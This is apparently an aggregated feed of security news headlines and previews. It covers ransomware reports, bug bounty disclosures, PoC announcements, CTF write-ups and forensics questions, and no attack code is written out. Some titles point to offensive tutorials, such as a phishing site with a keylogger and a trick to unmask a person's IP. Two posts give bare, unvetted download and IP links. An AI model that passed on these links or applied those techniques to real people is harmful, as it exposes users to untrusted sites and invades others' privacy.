    Black Basta is ransomware as a service (RaaS) that first emerged in April 2022. However, evidence suggests that it has been in development since February. The Black Basta operator(s) use the double extortion technique, meaning that in addition to encrypting files on the systems of targeted organizations and demanding ransom to make decryption possible, they also maintain a dark web leak site where they threaten to post sensitive information if an organization chooses not to pay ransom. The post Threat Assessment: Black Basta Ransomware appeared first on Unit 42.
  • Open

    Advent of Cyber 3 (2021): Day 16 Write-up [TryHackMe]
    Welcome to Day 16 write-up, and I hope you find it helpful. Continue reading on System Weakness »
  • Open

    SecWiki News 2022-08-25 Review
    Antenna: a platform for assisting in verifying the existence and exploitability of vulnerabilities, by ourren; The offensive and defensive road of firmware penetration, by ourren; How to brute-force encrypted fields in a login interface?, by SecIN Community; For more of the latest articles, visit SecWiki
  • Open

    Is it safe to whitelist access based on user agents?
    One of my users wants to use a 3rd party tool to crawl our website (for SEO analysis, etc). However, they are requesting to have it whitelisted. I believe they want to whitelist the user agent. My question is, is it safe to whitelist based on user agents? Makes me nervous; user agents are really not unique, correct? Don't we all have user agents? Out of the millions/billions of people online, I'm sure many have the same. submitted by /u/87390989 [link] [comments]
    More Hackers Adopt Sliver Toolkit as a Cobalt Strike Alternative
    submitted by /u/anusec [link] [comments]
    Creating Honeypot Access Points using Hostapd
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Unauthorized access
    GitLab disclosed a bug submitted by mega7: https://hackerone.com/reports/1669176
    Non-revoked API Key Information disclosure via Stripo_report()
    Stripo Inc disclosed a bug submitted by deb0con: https://hackerone.com/reports/1613714
    Default Login Credentials on https://broadbandmaps.mtn.com.gh/
    MTN Group disclosed a bug submitted by theranger: https://hackerone.com/reports/1297480
    Pause-based desync in Apache HTTPD
    Internet Bug Bounty disclosed a bug submitted by albinowax: https://hackerone.com/reports/1667974 - Bounty: $4000
  • Open

    Exploiting PrintNightmare (CVE-2021–34527)
    This post provides a high-level overview of the PrintNightmare vulnerability and demonstrates successful exploitation against a Windows… Continue reading on InfoSec Write-ups »
    Bug Bounty Tips, Desync Attacks, SSRF, SQL Injection, Vulnerabilities in CPU, RCE, and much…
    No content preview
    Write-up: Host header authentication bypass @ PortSwigger Academy
    No content preview
    This SIMPLE trick will exploit image uploads - $2500 TikTok bug bounty.
    Stored XSS in SVG files. Continue reading on InfoSec Write-ups »
    Server Side Template Injections Portswiggers Labs Walkthrough.
    No content preview
    How I found my first RCE!
    No content preview
    Cool Recon techniques every hacker misses!
    No content preview
    Bug Bounty Tips, Desync Attacks, SSRF, SQL Injection, Vulnerabilities in CPU, RCE, and much more…
    No content preview
  • Open

    My Top 3 HACKING Tools
    For a Penetration Tester the right methodology is key. In order to implement that methodology, it is still crucial to have some sort of a… Continue reading on System Weakness »
    Day 62 #100DaysOfHacking
    PMAT Lab continued Continue reading on Medium »
  • Open

    Adult content and other stuff
    http://54.39.52.63/ submitted by /u/RainyAbrar [link] [comments]
    Nyan Cat GIFs
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Kudos and Recognition
    During my time in the industry, I've seen a couple of interesting aspects of "information sharing". One is that not many like to do it. The other is that, over time, content creation and consumption has changed pretty dramatically. Back in the day, folks like Chris Pogue, with his The Digital Standard blog, and Corey Harrell with his Journey Into IR blog, and even more recently, Mari with her Another Forensics Blog have all provided a great deal of relevant, well-developed information. A lot of what Mari shared as far back as 2015 has even been relevant very recently, particularly regarding deleted data in SQLite databases. And, puh-LEASE, let's not forget Jolanta Thomassen, who, in 2008, published her dissertation addressing unallocated space in Registry hives, along with the first tool (…

  • Open

    EtwSessionHijacking: Blocking Procmon from monitoring network events
    submitted by /u/sanitybit [link] [comments]
    Stripping nthLink VPN encryption
    submitted by /u/yarmak [link] [comments]
    Attack surface of browser extension pages
    submitted by /u/sanitybit [link] [comments]
    Exploitation in the era of formal verification - a peek at a new frontier
    submitted by /u/lojump1 [link] [comments]
    Twitter Whistleblower Document Archive
    submitted by /u/sanitybit [link] [comments]
    Cherrybomb: OAS file auditor and API scanner just released version v0.7.0! would love input for more scans to implement
    submitted by /u/RazCherrybomb [link] [comments]
    Misconfigured Resource-Based Policies - Hacking The Cloud
    submitted by /u/RedTermSession [link] [comments]
  • Open

    Chaining Telegram bugs to steal session-related files.
    We will discuss the chaining of two bugs on the telegram android application, which can make malicious applications steal internal… Continue reading on Medium »
    Server Side Template Injections Portswiggers Labs Walkthrough.
    Hi my name is Hashar Mujahid. Today we are going to solve some labs regarding server-side template Injections. Continue reading on InfoSec Write-ups »
    Could GitHub Copilot produce a vulnerable code?
    GitHub Copilot is an interesting solution that promises to simplify the developer’s day-to-day tasks. Continue reading on Medium »
    Break the Logic: Insecure Parameters (€300)
    Hello everyone. Today, I’m going to talk about two minor vulnerabilities based on insecure parameters that I discovered in the same… Continue reading on InfoSec Write-ups »
    Break the Logic: Insecure Parameters (€300)
    Hello everyone. Today, I’m going to talk about two minor vulnerabilities based on insecure parameters that I discovered in the same… Continue reading on Medium »
  • Open

    Detego Forensics product experience
    If you have had experience with Detego Forensics, how does it compare to other similar products you have used? submitted by /u/VLTmike801 [link] [comments]
    Elcomsoft IOS Agent
    I have an iPhone 7 running 15.0.2, which is supported by the Elcomsoft iOS Forensic Toolkit. I go through the steps of the paid Apple developer account. In the process of trying to install the agent, I put in the developer account and then the app password; it says "device detected", gives me information about my device, and then it reads "the requested backup could not be found". Any ideas on how to get around this? The phone is in airplane mode but connected to WiFi. I have tried different ports and different computers and cables, tried rebooting and then uninstalling and reinstalling, disabled my security then reinstalled; after doing all that I am still getting the same error. Any help? submitted by /u/dougman2082 [link] [comments]
    What would be the proper way to acquire a raw disk dump from an iPhone 3GS on iOS 6.1.6?
    I got this phone that I would like to use to practice. I'm absolutely new to all this; the closest I've been is imaging old HDDs from vintage computers and recovering interesting (non-personal) files and software. And that's what I would like to try on mobile phones too. Googling for the 3GS specifically led me to a paper and then to a book by Jonathan Zdziarski which I think laid down the foundations pretty well. But that was in 2009 and now things are different, I suppose. From what I gathered I have the iTunes option, which I think I should do first. But that won't let me dig at a lower level, in order to recover or peek at what was potentially deleted. There's a RAM disk method, which I have no idea if it's still up to date (the materials I read only go up to iOS 3x) and honestly haven't looked deeper. And the jailbreaking tools p0sixspwn and redsn0w. I think these would be the easiest and the most logical approach, but looking at what packages they install I'm not sure if they do it in the system partition or in the user partition. Which of these would be the best, in a proper forensics acquisition manner? Since this iOS version has encryption schemes, does it make any sense to carve the unused space? Since this is just for personal use, I'd prefer to stay with free or trial versions of software. I am also limited to Windows XP/Vista as these are my legacy "workstations" where I already do some raw imaging (optical media and a couple of magnetics, but these have "click next, next, ok" UIs, so not that technical). submitted by /u/dismalwasteland [link] [comments]
  • Open

    NordVPN Linux Client - Unsafe service file permissions leads to Local Privilege Escalation
    Nord Security disclosed a bug submitted by bashketchum: https://hackerone.com/reports/1218523 - Bounty: $700
    Reflected XSS on pages.email.sel.sony.com/page.aspx via jobid parameter
    Sony disclosed a bug submitted by leo_rac: https://hackerone.com/reports/1309949
    Golang expvar Information Disclosure
    Uber disclosed a bug submitted by mustafa_farrag: https://hackerone.com/reports/1650035 - Bounty: $500
    Off-by-slash vulnerability in nodejs.org and iojs.org
    Node.js disclosed a bug submitted by nagaro: https://hackerone.com/reports/1631350
    support.invisionpower.com takeover the subdomain with Zendesk
    Invision Power Services, Inc. disclosed a bug submitted by fthacker101: https://hackerone.com/reports/1646554
  • Open

    Hunting for emerging command-and-control frameworks
    submitted by /u/SCI_Rusher [link] [comments]
    Join a Red Team?
    All, not sure if this is the right place for this, but I was reaching out as I am continuing on my journey to pivot to pen testing, and I'm looking to get together with a group to grow and learn with! Does anyone have a team they're looking to add another new person onto? Doesn't need to be anything serious, but even a social group that meets to do bug bounties, RE, etc. would be awesome! submitted by /u/schemaadmin [link] [comments]
    Windows PrivEsc — Hijacking DLLs
    submitted by /u/Clement_Tino [link] [comments]
    🔥 RPCMon: A new tool based on Event Tracing for Windows to monitor RPC calls 🔥
    submitted by /u/kubiscan [link] [comments]
  • Open

    SecWiki News 2022-08-24 Review
    2021 Attack Techniques Development Trends Report (full text), by ourren; A rural credit enterprise's practice in building an independently developed automated security baseline detection platform, by ourren; Highlights of the IJTCS-FAW 2022 Machine Learning and Formal Methods sub-forum, by ourren; Methods for using PHP-FPM as an in-memory webshell, by ourren; For more of the latest articles, visit SecWiki
  • Open

    MSF — Executable Payload Injection
    The peinector module injects a payload into a Windows executable, allowing the reverse connection to be established as soon as… Continue reading on 100security »
    Is your company prepared for a Deepfake?
    I know, this title may be a bit flashy and even sound unreal, but we are not far from that reality, and I'm going to show you the… Continue reading on Medium »
    Top 3 HACKING Operating Systems + BONUS TIP
    In my opinion an operating system is just a tool. The tool has to help me to achieve my goals in the most efficient way possible. I have… Continue reading on Medium »
  • Open

    Mining Trojan Starts Using Tox as a New C&C Method
    Tox has previously been seen being used by attackers for communication; recently the Uptycs threat research team found ELF sample files that use the Tox protocol.
    FreeBuf Morning News | US proposes legislation to ban procurement of vulnerable software; Microsoft discloses details of a ChromeOS vulnerability
    Software vendors must guarantee that "none of the items listed in the submitted software bill of materials contain known vulnerabilities or defects that affect the security of the final product or service", and provide proof.
    2022 CCS Conference Topic Preview | CCS & 斗象科技 - Financial Security Sub-forum
    斗象科技 and 无糖信息 are hosting one of the major sub-forums of the CCS conference, the Financial Security Sub-forum, bringing you 6 financial security topics. Fintech, empowered by security!
    Former Twitter Security Chief Alleges "Egregious" Security Vulnerabilities
    Zatko alleges that Twitter has "egregious" vulnerabilities in its security practices and "serious deficiencies" in security, privacy and content moderation.
    GitLab Fixes a Remote Code Execution Vulnerability in the CE and EE Editions
    DevOps platform GitLab has fixed a critical remote code execution vulnerability in its Community Edition (CE) and Enterprise Edition (EE).
    Phishing Attacks Abusing SaaS Platforms Surge 11-fold
    Data show that from June 2021 to June 2022, this kind of abuse increased sharply, by 1100%.
    Suspected APT Group Launches Phishing Attack Against the Turkish Navy
    The attackers encrypt the document contents to trick the victim into enabling macros; once macros are enabled, the contents of the document are decrypted and malicious VBA code runs.
  • Open

    Break the Logic: Insecure Parameters (€300)
    No content preview
    Write-up: Upload Vulnerabilities @ TryHackMe
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection attack, querying the database type and version…
    No content preview
  • Open

    Drones & OSINT: What Flies Ahead
    We know about the OSINT tools and techniques for boats, planes and trains, but what about drones? This blog aims to fill that gap. Continue reading on Medium »
    Hacker Methodology (indon
    Hacker methodology is the step-by-step process, or the phases, that a hacker carries out in order. We all probably think that hacking… Continue reading on Medium »
  • Open

    Microsoft details critical vulnerability in ChromeOS
    Article URL: https://www.theregister.com/2022/08/23/microsoft_chromeos_bug/ Comments URL: https://news.ycombinator.com/item?id=32576355 Points: 1 # Comments: 0
  • Open

    Python for Data Analytics VS Python for Machine Learning (for cyber security)
    If I wanted to advance my Python skillset, which direction do you think would be more useful/practical: Python for Data Analytics (I guess you can parse log files better, maybe)... or Python for Machine Learning (customizing your IDS, maybe)... What do you think? submitted by /u/extremexample [link] [comments]

  • Open

    BBOT — Bighuge BLS OSINT Tool
    BBOT is a recursive, modular OSINT framework written in Python. It is capable of running the entire OSINT process in a single command… Continue reading on 100security »
    Powershell POC for CVE-2022–26923
    Since you are here I assume that you already know what CVE-2022–26923 is all about. Continue reading on Medium »
    You should learn THIS before HACKING
    Hacking, Penetration Testing and Red Teaming is a broad field and requires huge amounts of skills in order to succeed. Continue reading on Medium »
  • Open

    Simple OSINT to Find Account in Several Social Media by Username
    OSINT ("Open Source" and "Intelligence") refers to tools that help with the information gathering process. Continue reading on Medium »
  • Open

    Software, Converters, Games, ETC
    https://down10.software/qp/data/ So much more than I put in the title. Enjoy :) XOXO submitted by /u/ManaHoney504 [link] [comments]
  • Open

    But You Told Me You Were Safe: Attacking the Mozilla Firefox Renderer (Part 2)
    submitted by /u/sanitybit [link] [comments]
    bomber - a vulnerability scanner for SBOMs
    submitted by /u/sanitybit [link] [comments]
    Chainsaw 2.0: Allows users to rapidly search through Windows event logs and hunt for threats using Sigma detection rules.
    submitted by /u/sanitybit [link] [comments]
    SBOM 101 - All the questions you were afraid to ask Software Bill of Materials
    submitted by /u/MiguelHzBz [link] [comments]
    Argument Injection in Visual Studio Code < 1.67.1 (CVE-2022-30129)
    submitted by /u/monoimpact [link] [comments]
    [CVE-2020-2733] Technical overview and PoC of bypassing admin authentication of JD Edwards EnterpriseOne
    submitted by /u/vah_13 [link] [comments]
    CVE-2022-22715 PoC: Windows Dirty Pipe
    submitted by /u/sanitybit [link] [comments]
    Masky is a python library providing an alternative way to remotely dump domain users’ credentials
    submitted by /u/sanitybit [link] [comments]
  • Open

    Making small things BIG
    Hacking Salesforce sites. Continue reading on Medium »
    What Is Session Fixation
    Session fixation is a web attack technique. The attacker tricks the user into using a specific session ID. After the user logs in to the… Continue reading on Medium »
    Session Hijacking
    Session hijacking is defined as taking over an active TCP/IP communication session without the user’s permission. When implemented… Continue reading on Medium »
    Broken Access Control
    Broken Access Control vulnerabilities are common in modern applications since the design and implementation of access control mechanisms… Continue reading on System Weakness »
    Finding Hidden Gems with Nuclei Templates!
    Lately, I have been thinking about automation. Continue reading on Medium »
    Hack The Pentagon — Command Injection (via CVE-2019–11510 and CVE-2019–11539)
    The Exploit Continue reading on Medium »
    Cool Recon techniques every hacker misses!
    Welcome to this article! This article is about some cool recon techniques every hacker misses! Tighten your belts as we walk you through… Continue reading on Medium »
  • Open

    'DirtyCred' Vulnerability Haunting Linux Kernel for 8 Years
    Article URL: https://www.securityweek.com/dirtycred-vulnerability-haunting-linux-kernel-8-years Comments URL: https://news.ycombinator.com/item?id=32570059 Points: 2 # Comments: 0
  • Open

    XSS and HTML Injection on the pressable.com search box
    Automattic disclosed a bug submitted by sawrav-chowdhury: https://hackerone.com/reports/1537149 - Bounty: $250
  • Open

    VA on Kubernetes cluster and pods
    Hi, so I have a client who hosts services on Kubernetes. I want to do a VA on those services/cluster. From the Nessus documentation I see that I'll have to install a container first to run a Nessus scan on those Kubernetes services. Any idea how I can proceed? I am surely a bit confused and would appreciate all the help I can get. Will remove this post if it doesn't match the guidelines. submitted by /u/light_striker12 [link] [comments]
  • Open

    SecWiki News 2022-08-23 Review
    The US Defense Industry Cyber Protection Framework and Its Implications, by ourren; The Truth About the Celer Network cBridge Cross-Chain Bridge Incident: BGP Hijacking, by ourren; K8S Cluster Security from the Attacker's Perspective (Part 1), by ourren; For more of the latest articles, visit SecWiki
  • Open

    Legitimate SaaS Platforms Being Used to Host Phishing Attacks
    Platform-abuse phishing is on the rise. We analyze how attackers use services such as website builders to host phishing pages. The post Legitimate SaaS Platforms Being Used to Host Phishing Attacks appeared first on Unit 42.
  • Open

    Attack-and-Defense Review Starry Night Talk | FreeBuf Cybersecurity Think Tank Talks Season 4 Officially Launches Today
    The afterglow of this year's attack-and-defense exercises has yet to fade, and Season 4 of FreeBuf Cybersecurity Think Tank Talks has already set off.
    peetch: A Security Research Platform for eBPF
    The peetch platform consists of multiple tools designed to help researchers bypass TLS protections in various ways, in order to study and analyze the security of eBPF.
    More Than 80,000 Cameras May Be Exploitable Because Users Have Not Updated Their Firmware
    Security researchers found that more than 80,000 cameras have not yet had their firmware updated and are vulnerable to a critical command injection vulnerability.
    Hackers Exploit Zero-Day to Steal Cryptocurrency from General Bytes ATMs
    According to The Hacker News, Bitcoin ATM manufacturer General Bytes confirmed that it suffered a cyberattack.
    FreeBuf Morning News | Hackers target Bitcoin ATM manufacturer; car dealership suffers major ransomware attack
    A threat actor calling itself "Mysterious Team" used the Raven Storm tool to carry out distributed denial-of-service (DDoS) attacks against multiple targets.
    BlackStone: A Powerful Penetration Testing Report Tool
    This tool lets us submit and store vulnerabilities discovered during penetration testing in a database, and classify them through internal and external audits.
  • Open

    Cloud stored files in iOS using Cellebrite
    I’ve been trying to research this but resources on cloud forensics have been difficult to find. Is it possible to retrieve files stored on iCloud (photos, keychain data, etc) through using a Cellebrite advanced logical/file system extraction methods or would these files not appear through these kind of extractions and would thus need the use of a cloud extraction approach? submitted by /u/holidaykid09 [link] [comments]
  • Open

    $5000 Bounty, Free Certification Courses, IndexDB, Reconnaissance Guide, Elasticsearch, and…
    No content preview
  • Open

    The Truth About the Celer Network cBridge Cross-Chain Bridge Incident: BGP Hijacking
    Authors: Thinking & 爱上平顶山 @ SlowMist Security Team. Original link: https://mp.weixin.qq.com/s/SInU_o3Ct-7A6pFbKLqzHQ Background: On August 18, Celer Network officially stated that between 3:45 and 6:00 Beijing time on August 18, some users of cBridge were directed to a malicious smart contract, and the cBridge front-end interface was suspected of having suffered a DNS H...
  • Open

    Information Security Checklist for Small to Medium Organizations
    submitted by /u/InformationSecurity [link] [comments]
    kyber-py: A pure python implementation of CRYSTALS-Kyber
    submitted by /u/sanitybit [link] [comments]
    Patch bypass for [CVE-2020-6369] Hard-coded Credentials in CA Introscope Enterprise Manager
    submitted by /u/vah_13 [link] [comments]
    Vulnerability in the enforcement of group permissions in Linux containers (Docker, Kubernetes, etc.)
    submitted by /u/sjmurdoch [link] [comments]
    “Useless” path traversals in Zyxel admin interface (CVE-2022-2030)
    submitted by /u/0xdea [link] [comments]
    Ridiculous vulnerability disclosure process with CrowdStrike Falcon Sensor
    submitted by /u/Ex1v0r [link] [comments]
    Trivy: Enhanced with AWS scan integration
    submitted by /u/Rewanth_Tammana [link] [comments]
    GitHub Cache Poisoning
    submitted by /u/BarakScribe [link] [comments]
  • Open

    API pentest requirements?
    I found an interesting article here and have a few questions. https://www.getsecureworld.com/blog/what-are-the-api-pentest-requirements/ I understand that user credentials are required per profile to test vulnerabilities related to broken access controls. But what about an API dataset? Here is the info taken from that site. An API dataset: Now, what if the documentation does not exist and you need to perform an API pentest. In this situation, you will need to give as much dataset about the API communication as possible. A dataset is simply a history group of requests and responses between the developers and your API. This could be retrieved from the test phase of your API. The request should include all the needed parameters with their values, and all the required authentication cookies and tokens. In addition, you should include at least one valid response for each request. The more API dataset you give to your service provider, the more tests he would perform, and of course, the more likely to find vulnerabilities. However, offering the API documentation stay the best solution for better results. Here is an example of such dataset: Message type Example Request GET http://example.com:8090/tpmRest/v1/participants/participant?isHost=false&name=partner1&isActive=true Response Successful operation response:{“result”:”Operate successfully”}Failed operation response:{“errorMessage”:”XXXXXX”} What is the common practice when you perform an API pentest? Do you get an API dataset during the initial meeting with your client? The reason I'm asking this is I found a bunch of articles and tutorials about API enumeration, e.g. API recon tutorials https://portswigger.net/support/using-burp-to-enumerate-a-rest-api https://www.redteamsecure.com/research/api-enumeration-with-redteam-securitys-tool-purl https://www.youtube.com/watch?v=fvcKwUS4PTE So, if we already have this API dataset, API enumeration is no longer required, right? submitted by /u/w0lfcat [link] [comments]
    Hacking Kioptrix Series (1-5) Vulnerable Machines from Vulnhub
    https://www.youtube.com/watch?v=WqqMDbWnQ70&list=PL0UJtYdHHM47v5ZboMZX1fp_mVz4EWqDQ submitted by /u/sunset_bytes [link] [comments]

    Vulnerability in the enforcement of group permissions in Linux containers
    Article URL: https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/# Comments URL: https://news.ycombinator.com/item?id=32557737 Points: 4 # Comments: 1
    Vulnerability in the enforcement of group permissions in Linux containers
    Article URL: https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/ Comments URL: https://news.ycombinator.com/item?id=32554741 Points: 3 # Comments: 0
    A ChromeOS remote memory corruption vulnerability
    Article URL: https://www.microsoft.com/security/blog/2022/08/19/uncovering-a-chromeos-remote-memory-corruption-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32551169 Points: 1 # Comments: 0
    Ridiculous vulnerability disclosure process with CrowdStrike Falcon Sensor
    Article URL: https://www.modzero.com/modlog/archives/2022/08/22/ridiculous_vulnerability_disclosure_process_with_crowdstrike_falcon_sensor/index.html Comments URL: https://news.ycombinator.com/item?id=32548671 Points: 299 # Comments: 150

    How do I determine the cause of strange IPFS NFT Storage URL traffic?
    Disclaimer: am baby tech. I am seeing consistent traffic to IPFS NFT storage URLs on my company network. The events occur on three computers simultaneously. The computers are all "owned" by the same user. The traffic occurs after hours, as well. I've checked for IPFS software, IPFS companion extension, unmineable sw, miners, Phoenix, etc. I've checked through the user's python code for anything sus. Can't find anything. I'm not sure what else to check, but this behavior doesn't seem normal to me. It seems like potential C2 traffic but I'm unsure how because it's just to NFT links? Has anyone come across this before? Thanks for the help ❤️ submitted by /u/BigTiddyIncelBF
    How to perform passive recon by company title.
    Hello folks, I'm curious if someone can share any advice/articles/guides on how to perform passive recon by company title. Any mentions, images, files, titles, or logos that have anything to do with the name of the company. Thank you in advance. submitted by /u/TRYH0
    Sample firewall/SIEM logs
    I need to do a couple of assignments to analyze some sample firewall/SIEM logs for any signs of intrusions/threats. Are there any resources where I can find realistic logs to do this type of analysis? submitted by /u/palm_snow

    Repeatability
    My understanding is that forensic analysis has to be repeatable to be deemed reliable. To this I ask, are screenshots admissible as forensic evidence? Especially if the process of collecting them is non-repeatable. For example, phone is seized and during manual review, screenshots are taken, or in fact pictures of the screen to show messages. Subsequently to this, the phone is not disconnected from the internet and messages are wiped from the device remotely. During a forensic download, these messages are now unable to be recovered. Would this evidence be inadmissible? submitted by /u/Clear-Alternative-57
    Outlook - Read access to another person's email.
    Hi. I'm trying to see if there is a local file on a user's computer that can tell me if that user has read access to another person's email. Does anyone know if this type of file exists in O365? submitted by /u/antmar9041
    PDF File Forensics | TryHackMe Confidential
    submitted by /u/MotasemHa
    NTFS Data Runs
    Hello, I'm trying to manually parse some data runs from an NTFS file system to recover a document. Is there a tool that would allow me to put the data run into it and have it parse the data run so I can save tons of time doing it by hand? Respectfully submitted by /u/Mazren79

    How a Port scan got me Nokia Hall of Fame
    Hi everyone. This is Mani Sashank, a security analyst who does bug bounty in his free time. 😄 Continue reading on Medium »
    How to: Breaching Cardholder Data in 50 hours
    Ever wondered how one can breach an organization’s network? In this article I talk about the steps I took to compromise a CDE environment. Continue reading on Medium »
    White Hat
    Bug bounty programs benefit companies by making use of ethical hackers who uncover bugs in their codes. When hackers discover… Continue reading on Medium »
    SSRF & Google HOF(Hall of Fame)
    This time I will talk about a very interesting SSRF(Server Side Request Forgery) on a Google asset and interesting because the way I found… Continue reading on Medium »
    Crimson — AppSec firearm III
    Guidelines for the crimson_exploit module usage. Continue reading on Medium »
    Stabilizing Netcat Shell
    The Basic Netcat shell has some limitations like we cannot use “Up arrow/Down arrow” to scroll through previous commands, cannot use the… Continue reading on Medium »
    How I found Login Credentials on PDF File
    Tool: Continue reading on Medium »
    How I found FTP Credentials in .DOCX file
    Tools: Continue reading on Medium »
    How I Found SQL Injection in 2 Day
    Tools: Continue reading on Medium »

    How to OSINT Russia? (even if you don’t speak Russian) Part 3— Telegram
    The swiss knife of Russian OSINT and weapon of choice for cyrillic communication. Got a lot of bad reputation in the last few years… Continue reading on Medium »

    How to: Breaching Cardholder Data in 50 hours
    Ever wondered how one can breach an organization’s network? In this article I talk about the steps I took to compromise a CDE environment. Continue reading on Medium »
    CRTO Review
    TLDR; Continue reading on Medium »
    5 Tips to ADVANCE your HACKING skills
    If you want to become a penetration tester or Red Teamer, then you need to have strong hacking skills. Continue reading on System Weakness »

    SecWiki News 2022-08-22 Review
    SecWiki Weekly (Issue 442) by ourren. For more of the latest articles, visit SecWiki

    Hugo to Jekyll
    I really didn't think it would happen. I was sure something like this would never occur. Exactly one year after switching from Jekyll to Hugo last year, I've changed my mind. I'm going back to Jekyll. Why Hugo! It is really fast and good. It solved in one stroke the build-speed issue that was the biggest problem back when I used Jekyll. And the biggest reason for going back to Jekyll a year later is, ironically, time. The build time itself is of course far faster with Hugo, but when it came to writing posts, Jekyll's Liquid syntax felt more comfortable than the Go templates Hugo uses. This is not limited to writing posts. Every time I customized the blog or built a feature, Jekyll let me solve it easily with Liquid and plugins (gems), whereas with Hugo I had to build it myself from template code, so the time spent maintaining that gradually started to add up. And finally, I was about to change the way I run the blog itself, and that became the trigger. The change in approach here is to reduce the number of low-quality posts and merge similar content. How Just as with the move from Jekyll to Hugo, I migrated with a Ruby script. As a bonus, I cleaned up in one pass the time format that had been mangled while bouncing between blogger, jekyll and hugo. require 'yaml' require 'time' prefix = "./content/post/" Dir.entries(prefix).each do | name | if name.strip != "." && name != ".." begin count = 0 head = "" body = "" File.readlines(prefix+name).each do |line| if count < 2 head = head + line else body = body + line...

    Portswigger Labs, how to get the most out of it
    or why looking up the solution underneath the lab isn’t cheating, it’s part of learning Continue reading on InfoSec Write-ups »
    Create a simple phishing website and a Javascript keylogger
    First Bug Bounty from DOS: Taking the service down
    Account takeover worth $1000
    PortSwigger Web Security Academy Lab: SQL injection attack, querying the database type and versio

    FreeBuf Morning Report | Google discloses the largest DDoS attack ever; a single USB cable can steal a Korean car
    Recently, a so-called "Kia Challenge" has taken off on TikTok and YouTube in the US: some Hyundai and Kia models can be started with nothing more than a USB cable.
    How can attack-and-defense exercise experience and capabilities be consolidated into day-to-day security defense? | FreeBuf enterprise-side community livestream recap
    The 15-day attack-and-defense exercise has ended, and both red and blue teams went through a major test. On August 18, the eighth FreeBuf enterprise-side community livestream held "Attack-and-Defense Review, Starry Night Talk", inviting well-known red- and blue-team experts to share practical exercise experience. The session was hosted by Fan Yuan, researcher at the Third Research Institute of the Ministry of Public Security; blue-team representatives Li Zonghui, security architect at an enterprise, and Jian Siting, head of the cybersecurity services team at an international automation vendor, together with red-team representatives Zhang Guiqing and Huang Weiyu, security service experts at 斗象科技 (Tophant), discussed attack-and-defense experience from five angles, including rule evolution, 0day exploitation and capability consolidation. FreeBuf
    Cybercrime group TA558 launches attacks on hotels, hospitality and travel organizations
    Researchers have identified a financially motivated cybercrime group linked to an ongoing wave of attacks against hotels and travel organizations in Latin America.
    Apple discloses serious security vulnerabilities, tops the trending charts
    Apple has published two security reports acknowledging serious security vulnerabilities in products including the iPhone, iPad and iMac.
    DEF CON: white-hat hackers demonstrate remote control of a decommissioned satellite
    The white-hat hacker group Shadytel gave a live demonstration of remotely hijacking a decommissioned satellite and using it to broadcast the famous hacker film WarGames.
    FreeBuf Morning Report | Positive non-nucleic-acid test results count as sensitive personal information; serious security vulnerabilities in iPhone and iMac
    Global updates 1. Apple security vulnerabilities top the trending charts, affecting iPhone, iMac and others. According to an AP report on the 20th, Apple released two security reports on the 17th local time, disclosing serious security vulnerabilities in products including the iPhone, iPad and iMac. These vulnerabilities could allow a potential attacker to break into a user's device, gain administrative privileges or even take full control of the device and run applications on it. [Read original] 2. Vietnam updates its cybersecurity law, requiring companies to store data locally. Vietnam's Ministry of Information and Communications this week

    Research on Chrome Sandbox Bypass
    Author: 启明星辰ADLab (Venustech ADLab). Original link: https://mp.weixin.qq.com/s/gqH0lqz1ey6IzT--UD9Jsg 01 Research background. As an important part of the security architecture of many mainstream applications, a sandbox confines a process to a restricted environment and prevents it from directly accessing system resources such as the disk. In Chromium, sandboxed processes interact through pipes and similar mechanisms with highly privileged processes that have I/O access in order to carry out further operations, so bypassing the sandbox via IPC has become...
    An RCE journey that began with a chance encounter with Flarum
    Original link: https://mp.weixin.qq.com/s/EqEyEDKpzxS5BYA_t74p9A Author: Phith0n. Disclaimer: this testing was carried out entirely in local or authorized environments, for learning and reference only; no unauthorized testing took place, and readers should not use this vulnerability for unauthorized testing, otherwise the author bears no responsibility. During a routine test I happened upon a forum built on Flarum and obtained its administrator account. At this point the task could already be considered complete, and the vulnerability reported...

    Increased CVE Activity in Curl?
    Article URL: https://daniel.haxx.se/blog/2022/08/22/increased-cve-activity-in-curl/ Comments URL: https://news.ycombinator.com/item?id=32548359 Points: 69 # Comments: 10

    Sqli + xss + html_injection at the same time.
    URL : Continue reading on Medium »


    the Dabbler
    Over the years, work/career-wise, I’ve done a few things a lot and a lot of things a little bit, focused mostly on data, reporting, and… Continue reading on Medium »
    ‘Decision-making centers’ — The Russian response to Dugina’s killing
    Some Russian Telegram responses to the killing of the nationalist intellectual’s daughter. Continue reading on Medium »
    Find Subdomains
    I’ve spent half a day playing around with various tools that could get me a list of subdomains for a given domain. Here’s what I found. Continue reading on Medium »
    Way for quick deanon
    There is one legal trick that allows you to quickly set the IP, time zone and browser of the person you are looking for. If you need to… Continue reading on Medium »
    SPY NEWS: 2022 — Week 33
    Summary of the espionage-related news stories for the Week 33 (August 14–20) of 2022. Continue reading on Medium »
    Making a cyberdetective trap…
    Your mission, if you undertake it, is to identify various intruders who are too comfortable with Telegram. They have learned to register… Continue reading on Medium »

    Certificates - Wildcard or no?
    Our wildcard cert is up for renewal in a couple of months, and I'm wondering if it is more secure to provision individual certificates for each of our services. I believe the wildcard was supplied by our old MSP out of laziness, but if a wildcard is suitable we will stick with that. We currently use the certificate for 3 external-facing services, and some internal-facing which will likely be replaced with certs from our internal CA instead. submitted by /u/brettfk
    Does anybody have [ALL] free threat intelligence source list?
    Hi All, I know Crowdstrike is a good choice but too expensive. I need your threat intelligence sources from your bookmarks (of course not all bookmark list :)) Any help would be appreciated! submitted by /u/110615

    NCIIPC — How I am able to find sensitive information in .gov.in by using google dorks
    In this blog, I am going to show you how a low severity vulnerability can be affected by critical information disclosure to the citizens. Continue reading on Medium »
    Clickjacking Vulnerability
    What is clickjacking Continue reading on Medium »
    Getting better at bug bounty / hacking
    Whilst this article isn’t going to contain any real golden nuggets around bug bounties or hacking, I thought I would take the time to talk… Continue reading on Medium »
    Step 20: Cross-Site Scripting (XSS)
    Back to HTB: Academy… I’m determined to finish this Bug Bounty Cert! Continue reading on Medium »
    Server Side Request Forgery (SSRF) Attacks
    Server-side request forgery (SSRF) attacks exploit software vulnerabilities that could allow an attacker to trick the server-side… Continue reading on Medium »

    Write-up: JWT authentication bypass via flawed signature verification @ PortSwigger Academy
